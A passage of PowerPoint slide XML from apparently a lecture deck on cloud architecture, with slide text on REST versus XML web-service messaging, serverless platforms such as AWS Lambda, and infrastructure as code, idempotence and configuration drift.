                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Representational</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>State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Transfer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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(REST)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21891" y="4157471"/>
            <a:ext cx="6553200" cy="2893060"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6553200" h="2893059">
                <a:moveTo>
                  <a:pt x="6273927" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="279272" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233957" y="3653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190975" y="14231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150901" y="31159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114309" y="53864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81772" y="81772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53864" y="114309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31159" y="150901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14231" y="190975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3653" y="233957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="279273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2613279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3653" y="2658594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14231" y="2701576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31159" y="2741650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53864" y="2778242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81772" y="2810779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114309" y="2838687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150901" y="2861392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190975" y="2878320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233957" y="2888898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279272" y="2892552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6273927" y="2892552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6319242" y="2888898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6362224" y="2878320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6402298" y="2861392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6438890" y="2838687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6471427" y="2810779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6499335" y="2778242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6522040" y="2741650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6538968" y="2701576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6549546" y="2658594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6553200" y="2613279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6553200" y="279273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6549546" y="233957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6538968" y="190975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6522040" y="150901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6499335" y="114309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6471427" y="81772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6438890" y="53864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6402298" y="31159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6362224" y="14231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6319242" y="3653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6273927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582927" y="4768748"/>
            <a:ext cx="4990465" cy="1534795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="180340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420"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="63636"/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Uses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XML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format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messaging.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-343535">
              <a:lnSpc>
                <a:spcPts val="3960"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="63636"/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Has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number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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Web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Services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(WS)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standards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308847" y="4157471"/>
            <a:ext cx="6553200" cy="2893060"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6553200" h="2893059">
                <a:moveTo>
                  <a:pt x="6273927" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="279273" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233957" y="3653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190975" y="14231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150901" y="31159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114309" y="53864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81772" y="81772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53864" y="114309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31159" y="150901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14231" y="190975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3653" y="233957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="279273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2613279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3653" y="2658594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14231" y="2701576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31159" y="2741650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53864" y="2778242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81772" y="2810779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114309" y="2838687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150901" y="2861392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190975" y="2878320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233957" y="2888898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279273" y="2892552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6273927" y="2892552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6319242" y="2888898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6362224" y="2878320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6402298" y="2861392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6438890" y="2838687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6471427" y="2810779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6499335" y="2778242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6522040" y="2741650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6538968" y="2701576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6549546" y="2658594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6553200" y="2613279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6553200" y="279273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6549546" y="233957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6538968" y="190975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6522040" y="150901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6499335" y="114309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6471427" y="81772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6438890" y="53864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6402298" y="31159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6362224" y="14231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6319242" y="3653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6273927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8528050" y="4768748"/>
            <a:ext cx="6071235" cy="1534795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="180340" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="297180" indent="-285115">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1420"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="63636"/>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="297180" algn="l"/>
                <a:tab pos="297815" algn="l"/>
              </a:tabLst>
            </a:pP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als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fer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RESTfu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APIs</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="297180" indent="-285115">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="63636"/>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="297180" algn="l"/>
                <a:tab pos="297815" algn="l"/>
              </a:tabLst>
            </a:pP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RES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quest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ca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HTTP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ope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ti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v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rb</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="297180" indent="-285115">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="63636"/>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="297180" algn="l"/>
                <a:tab pos="297815" algn="l"/>
              </a:tabLst>
            </a:pP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Noun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endpoints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accessed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as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URLs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45200" y="306451"/>
            <a:ext cx="41636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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Serverless</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-200">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Architecture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18176" y="760476"/>
            <a:ext cx="5795772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74570" y="1694840"/>
            <a:ext cx="12113260" cy="175196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21075" marR="5080" indent="-3509010">
              <a:lnSpc>
                <a:spcPct val="115100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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serverless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architecture,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service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provisioning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completely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abstracted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from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hardware,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OS,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platform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layers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which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include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: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50">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marR="421005">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>AWS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-15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Lambda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49508" y="5981446"/>
            <a:ext cx="2080895" cy="6972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Mi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sof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Azure</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="1905">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
            </a:pP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Functions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87495" y="5981446"/>
            <a:ext cx="1774825" cy="6972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Go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175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5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oud</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="635">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
            </a:pP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Functions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65120" y="7126223"/>
            <a:ext cx="10518775" cy="1277620"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10518775" h="1277620">
                <a:moveTo>
                  <a:pt x="10305795" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="212852" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164032" y="5619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119224" y="21626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79704" y="46746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46746" y="79704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21626" y="119224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5619" y="164032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="212851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1064247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5619" y="1113055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21626" y="1157860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46746" y="1197384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79704" y="1230348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119224" y="1255476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164032" y="1271490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212852" y="1277112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10305795" y="1277112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10354615" y="1271490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399423" y="1255476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10438943" y="1230348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10471901" y="1197384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10497021" y="1157860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10513028" y="1113055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10518647" y="1064247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10518647" y="212851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10513028" y="164032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10497021" y="119224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10471901" y="79704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10438943" y="46746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399423" y="21626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10354615" y="5619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10305795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133089" y="7330541"/>
            <a:ext cx="9978390" cy="7912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87475" marR="5080" indent="-1375410">
              <a:lnSpc>
                <a:spcPct val="114199"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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All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hardware,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OS,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platform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management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is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security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cloud,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and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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these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architectures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heavily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reliant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orchestration.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624637" y="3709415"/>
            <a:ext cx="3028950" cy="2567940"/>
            <a:chOff x="6624637" y="3709415"/>
            <a:chExt cx="3028950" cy="256794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0023" y="3981356"/>
              <a:ext cx="2255520" cy="22959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91627" y="4728971"/>
              <a:ext cx="972312" cy="97231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629400" y="5714999"/>
              <a:ext cx="3019425" cy="401320"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3019425" h="401320">
                  <a:moveTo>
                    <a:pt x="540130" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="371348"/>
                  </a:lnTo>
                </a:path>
                <a:path w="3019425" h="401320">
                  <a:moveTo>
                    <a:pt x="2549652" y="16763"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3019044" y="401066"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="E3B36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183880" y="3709415"/>
              <a:ext cx="0" cy="339725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="0" h="339725">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="339344"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525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400" y="306451"/>
            <a:ext cx="4011929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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Infrastructure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190">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code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73040" y="760476"/>
            <a:ext cx="565251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465323" y="1933193"/>
            <a:ext cx="1173162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All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configuration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provisioning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performed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by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scripting,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automation,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orchestration.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83179" y="3695700"/>
            <a:ext cx="900683" cy="89916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34995" y="5667755"/>
            <a:ext cx="899159" cy="899159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3854196" y="5580888"/>
            <a:ext cx="9100185" cy="1201420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9100185" h="1201420">
                <a:moveTo>
                  <a:pt x="8899652" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200151" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154275" y="5288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112152" y="20352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74988" y="43987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43987" y="74988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20352" y="112152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5288" y="154275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="200151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1000760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5288" y="1046636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20352" y="1088759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43987" y="1125923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74988" y="1156924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112152" y="1180559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154275" y="1195623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200151" y="1200912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8899652" y="1200912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8945528" y="1195623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8987651" y="1180559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9024815" y="1156924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9055816" y="1125923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9079451" y="1088759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9094515" y="1046636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9099804" y="1000760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9099804" y="200151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9094515" y="154275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9079451" y="112152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9055816" y="74988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9024815" y="43987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8987651" y="20352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8945528" y="5288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8899652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692522" y="5747156"/>
            <a:ext cx="7423150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60705" marR="5080" indent="-548640">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Idempotence</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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means</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>making</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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same</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>call</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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dirty="0" sz="22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same </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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parameters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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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always</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>produce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same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result.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28288" y="3508247"/>
            <a:ext cx="9075420" cy="1216660"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9075420" h="1216660">
                <a:moveTo>
                  <a:pt x="8872728" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="202691" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156234" y="5356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113577" y="20611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75942" y="44547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44547" y="75942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20611" y="113577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5356" y="156234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="202691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1013460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5356" y="1059917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20611" y="1102574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44547" y="1140209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75942" y="1171604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113577" y="1195540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156234" y="1210795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202691" y="1216152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8872728" y="1216152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8919185" y="1210795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8961842" y="1195540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8999477" y="1171604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9030872" y="1140209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9054808" y="1102574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9070063" y="1059917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9075419" y="1013460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9075419" y="202691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9070063" y="156234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9054808" y="113577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9030872" y="75942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8999477" y="44547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8961842" y="20611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8919185" y="5356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8872728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049648" y="3682136"/>
            <a:ext cx="8632825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60625" marR="5080" indent="-2447925">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Elimination</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>inconsistency</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="220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(snowflakes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>drift)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>one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th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mai</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
